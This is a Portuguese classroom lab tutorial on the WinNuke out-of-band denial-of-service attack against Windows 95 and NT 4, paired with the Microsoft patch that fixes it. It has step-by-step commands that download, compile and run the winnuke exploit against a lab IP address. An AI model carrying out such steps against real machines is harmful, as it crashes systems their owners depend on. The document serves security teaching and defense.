Como os hackers conseguem derrubar a conexao de um Internauta com Windows 95 e NT4:


INTRODUÇÃO
O exploit winnuke.c explora uma bug existente no sistema de rede do Windows 95 e do NT 4. Basicamente, o exploit se conecta na porta 139 e envia pacotes com “lixo” para dentro desta porta. Este ataque também é conhecido como ataque OOB (Out of Bounds) e derruba a conexão TCP/IP da máquina, exigindo que o sistema operacional seja reiniciado.
Nesta aula usaremos a estacao17 Linux para demonstrar o ataque.

PRÉ-REQUISITOS:
Para compilar o exploit é necessário corrigir os links quebrados do pacote kernel-headers do Conectiva Linux 7.0:
ln –sf /usr/src/linux-2.4.5/include/linux/ /usr/include/linux
ln –sf /usr/src/linux-2.4.5/include/asm /usr/include/asm
Depois obtenha o exploit “winnuke.c” disponível em:
wget http://jeanchristian.com/exploits/winnuke.zip
E prossiga descompactando o pacote:
unzip winnuke.zip

Finalmente, compile o exploit:
gcc –o winnuke winnuke.c
Supondo que a máquina alvo seja uma estação Windows 95 com IP 192.168.0.6 verifique se ela está visível na rede:
ping 192.168.0.6 –c 4
Depois, teste o ataque usando o exploit conforme a linha a seguir:
./winnuke 192.168.0.6

CONSEQUÊNCIA DO ATAQUE EM MÁQUINAS COM WINDOWS 95
Após a execução do ataque, estações Windows95 apresentarão a “tela azul da morte”...
perdendo a conexão TCP/IP com a rede...

e exigindo que a máquina Windows 95 seja reiniciada para reestabelecer sua conexão TCP/IP com a rede:

CONSEQUÊNCIA DO ATAQUE EM MÁQUINAS COM NT 4
Após a execução do ataque, estações NT 4 apresentarão a tela de crash e serão reiniciadas automaticamente:

PROTEGENDO O WINDOWS 95 CONTRA O ATAQUE DO WINNUKE
Para proteger seu sistema Windows 95 do ataque Winuke você deve instalar o patch fornecido pela Microsoft “Vtcpupd.exe”:
http://support.microsoft.com/default.aspx?scid=http://download.microsoft.com/download/win95upg/patch1/1/w95/EN-US/vtcpupd.exe
Depois do download, execute o programa “Vtcpupd.exe” e clique no botão “Sim” quando aparecer uma caixa de diálogo avisando que o programa irá atualizar o seu Driver TCP:
Quando a instalação do patch for concluída, aparecerá a caixa de diálogo “Update Complete”:
Então, reinicie o Windows para a atualização fazer efeito:
Depois, tente realizar um novo ataque contra a máquina atualizada:
Observe na figura a seguir que o ataque não foi bem sucedido, pois, ainda é possível manter contato com a máquina alvo:
ping 192.168.0.6

Dessa forma, concluímos a demonstração da eficiência do patch vtcpupd.exe para corrigir a vulnerabilidade do Windows 95 contra o ataque do Winuke.
Para proteger o Windows NT 4 contra o ataque do winnuke, veja a aula “Instalando o último Service Pack no Windows NT4/2000”